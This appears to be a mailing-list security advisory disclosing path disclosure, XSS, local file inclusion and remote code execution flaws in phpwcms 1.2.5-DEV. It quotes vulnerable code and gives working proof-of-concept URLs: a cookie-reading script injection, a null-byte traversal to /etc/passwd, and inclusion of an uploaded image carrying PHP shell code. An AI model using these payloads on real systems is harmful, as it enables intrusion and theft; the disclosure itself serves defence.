Vendor: http://www.phpwcms.de
Bugs: Path Disclosure, XSS, Local File Inclusion,
Remote Code Execution
Vulnerable Version: phpwcms 1.2.5-DEV (prior versions
also maybe affected)
Exploitation: Remote with browser

Description:
--------------------
phpwcms is a web content management system optimized
for fast and easy setup on any standard web server.
phpwcms is perfect for professional, public and
private users.

Vulnerability:
--------------------
-->>Path Disclosure<<--
Reason: direct access to include files that generates
php error with installation path information.
Several files are vulnerable in this case.
Example:
http://example.com/phpwcms/include/inc_lib/files.public-userroot.inc.php
http://example.com/phpwcms/include/inc_lib/files.private.additions.inc.php

-->>XSS<<--
Reason: when register globals is enable several
template files are vulnerable to xss.

Example:
http://localhost/php/phpwcms/include/inc_tmpl/content/cnt6.inc.php?BL[be_cnt_plainhtml]=<script>alert(document.cookie)</script>

Code Snippet:
/include/inc_tmpl/content/cnt6.inc.php //line#28
<?php echo $BL['be_cnt_plainhtml'] ?>

-->>Local File Inclusion<<--
Reason: Incorrect use of spaw script (external script)
and its configuration result in local file inclusion
when register globals is enable and gpc_magic_quotes
is Off.

http://localhost/php/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../../etc/passwd%00

Code Snippet:
/include/inc_ext/spaw/spaw_control.class.php
//lines:#15-20

if (preg_match("/:\/\//i", $spaw_root)) die ("can't
include external file");

include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';

-->>Remote Code Execution<<--
Reason: It is possible for an attacker to upload a
picture with php code as EXIF metadata content in his
post and then he can uses above vulnerability to
conduct remote code execution.

Example:
http://example.com/phpwcms/include/inc_ext/spaw/spaw_control.class.php?spaw_root=../../../picture/upload/shell.jpg%00

Solution:
--------------------
Vendor has been contacted but we are not aware of any
vendor supplied patch.
 
Original Advisories:
--------------------
http://www.kapda.ir/advisory-331.html
IN Farsi:http://irannetjob.com/
Credit:
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com